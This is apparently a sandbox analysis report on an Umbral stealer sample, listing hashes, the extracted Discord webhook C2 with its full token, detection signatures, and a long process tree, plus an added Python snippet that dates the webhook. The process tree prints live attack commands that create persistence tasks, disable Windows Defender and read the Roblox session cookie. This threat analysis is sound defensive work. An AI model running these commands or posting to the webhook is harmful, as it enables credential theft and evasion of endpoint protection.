Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    05-06-2024 01:53

General

  • Target

    Client.exe

  • Size

    380KB

  • MD5

    7091d715676e10c44205e6fa7f50b7bd

  • SHA1

    a950398047b6b554181538d6e78ada18bfba510e

  • SHA256

    23f43cc11c07245b3c5c14333a53b97330ebd7afa4a893245834fbebfa967d88

  • SHA512

    2fd66a8fd5b4d0f1ef52f6cd89b8e14936b56fdb967a83382d8081e67fbbabdb609decef98d19c8caebcc1b5b9bcc3cbaa0209112c9c081556ff87bfcdf7308b

  • SSDEEP

    6144:MwZC8z6GIwaC9M1G4TIcgGz+rH4uCBbhZnKMgVia:RZC8OGgt1G4TGY+NCNn4Vi

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1247729405409759390/zWUzhv3beId_l06S4nnTrfCRsAkIoHRjlpnuQcnbUkUm0eJjGGkP-VfghAOgfXCbrdiS
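The webhook above is the only C2 the config yields, and it carries more than a URL to block. Discord webhook IDs are Snowflakes: bits 63..22 are a millisecond timestamp relative to the Discord epoch (2015-01-01T00:00:00Z), so the ID alone dates the creation of the exfiltration channel, and the trailing token is the secret that authorises posting to it. The following is an added example written for this page (it is not part of the sandbox report or of Umbral); it parses the extracted URL, decodes the creation time, and compares it with the report's submission time, which is assumed here to be UTC.

```python
"""Decode the Umbral C2 webhook from the Malware Config section (added example)."""
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import urlsplit

# Discord Snowflake epoch: 2015-01-01T00:00:00Z.
DISCORD_EPOCH = datetime(2015, 1, 1, tzinfo=timezone.utc)

# Webhook URL exactly as extracted in the Malware Config section above.
UMBRAL_C2 = ("https://discord.com/api/webhooks/1247729405409759390/"
             "zWUzhv3beId_l06S4nnTrfCRsAkIoHRjlpnuQcnbUkUm0eJjGGkP-VfghAOgfXCbrdiS")

# Submission timestamp from the Analysis section; the timezone is an assumption (UTC).
SUBMITTED = datetime(2024, 6, 5, 1, 53, tzinfo=timezone.utc)

WEBHOOK_HOSTS = {"discord.com", "discordapp.com", "ptb.discord.com", "canary.discord.com"}
WEBHOOK_PATH = re.compile(r"^/api/(?:v\d+/)?webhooks/(\d{17,20})/([A-Za-z0-9_-]+)/?$")


def parse_discord_webhook(url: str):
    """Return (webhook_id, token) for a Discord webhook URL, or None for anything else."""
    parts = urlsplit(url)
    if parts.scheme != "https" or parts.hostname not in WEBHOOK_HOSTS:
        return None
    m = WEBHOOK_PATH.match(parts.path)
    if not m:
        return None
    return int(m.group(1)), m.group(2)


def snowflake_to_datetime(snowflake: int) -> datetime:
    """Creation time encoded in a Snowflake: the top 42 bits are ms since DISCORD_EPOCH."""
    return DISCORD_EPOCH + timedelta(milliseconds=snowflake >> 22)


def webhook_created(url: str):
    """Creation time of the webhook behind `url`, or None if it is not a Discord webhook."""
    parsed = parse_discord_webhook(url)
    return snowflake_to_datetime(parsed[0]) if parsed else None


def webhook_age_at_submission(url: str, submitted: datetime = SUBMITTED) -> timedelta:
    """How long the webhook had existed when the sample was submitted."""
    created = webhook_created(url)
    if created is None:
        raise ValueError("not a Discord webhook URL")
    return submitted - created


if __name__ == "__main__":
    wid, token = parse_discord_webhook(UMBRAL_C2)
    print("webhook id :", wid)
    print("token      :", token[:8] + "..." + token[-4:])   # keep the secret out of tickets
    print("created    :", webhook_created(UMBRAL_C2).isoformat())
    print("age at sub :", webhook_age_at_submission(UMBRAL_C2))
```

For this sample the ID decodes to 2024-06-05T01:51:11Z, about two minutes before the 01:53 submission if that timestamp is UTC: the operator created the webhook and built or tested the client in the same sitting. When reporting the URL to Discord or adding it to a blocklist, the full URL is needed; in internal tickets the token is a credential and should be truncated as above.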

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable containing code to disable Windows Defender capabilities such as real-time monitoring and block at first sight.

  • Detect Umbral payload 2 IoCs
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • UAC bypass 3 TTPs 3 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Start PowerShell.

  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 46 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to enumerate the installed video card.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    1⤵
    • Modifies WinLogon for persistence
    • UAC bypass
    • Checks whether UAC is enabled
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2848
    • C:\Windows\system32\CMD.exe
      "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Visio" /tr "C:\Program Files\$77fuh.exe" & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2568
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Visio" /tr "C:\Program Files\$77fuh.exe"
        3⤵
        • Creates scheduled task(s)
        PID:2556
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2504
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:2564
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1576
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:2688
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1548
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1720
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:820
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1924
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2300
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:768
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2280
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1580
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1368
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1148
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1532
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1284
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2104
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1224
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2072
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1996
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:324
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:556
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:924
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1416
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:1584
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1796
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:1800
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1728
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:2116
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:2044
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:1124
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:2924
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:2888
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:496
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:1004
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1236
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:1608
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1448
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:1312
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:356
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:404
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:960
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:1012
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:2956
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:888
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:704
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:1708
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:2776
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:1552
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:3008
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:2220
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:2980
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:1676
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:892
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:2844
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:2728
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:1516
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:2800
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:2964
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:2588
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:2908
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:2348
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:2304
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:2508
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:2768
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:2580
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe"' & exit
      2⤵
      PID:2556
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe"'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2444
        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe
          "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe"
          4⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2684
          • C:\Windows\system32\attrib.exe
            "attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe"
            5⤵
            • Views/modifies file attributes
            PID:2352
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1736
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2204
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1996
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:792
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" os get Caption
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2080
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" computersystem get totalphysicalmemory
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1988
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            5⤵
            PID:2932
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:2272
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            5⤵
            • Detects videocard installed
            PID:1956
          • C:\Windows\system32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe" && pause
            5⤵
            PID:1556
            • C:\Windows\system32\PING.EXE
              ping localhost
              6⤵
              • Runs ping.exe
              PID:960
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:548
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1924
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:1568
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1148
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:964
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:944
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:2008
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:968
    • C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
      2⤵
      PID:1680
      • C:\Windows\system32\schtasks.exe
                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                                      3⤵
                                                                      • Creates scheduled task(s)
                                                                      PID:2804
                                                                  • C:\Windows\system32\CMD.exe
                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                                                    2⤵
                                                                      PID:2720
                                                                      • C:\Windows\system32\schtasks.exe
                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                                        3⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:1476
                                                                    • C:\Windows\system32\CMD.exe
                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                                                      2⤵
                                                                        PID:1452
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                                          3⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:652
                                                                      • C:\Windows\system32\CMD.exe
                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                                                        2⤵
                                                                          PID:2232
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                                            3⤵
                                                                            • Creates scheduled task(s)
                                                                            PID:900
                                                                        • C:\Windows\system32\CMD.exe
                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                                                          2⤵
                                                                            PID:1444
                                                                            • C:\Windows\system32\schtasks.exe
                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                                              3⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:1952
                                                                          • C:\Windows\system32\CMD.exe
                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                                                            2⤵
                                                                              PID:2796
                                                                              • C:\Windows\system32\schtasks.exe
                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                                                3⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:2476
                                                                            • C:\Windows\system32\CMD.exe
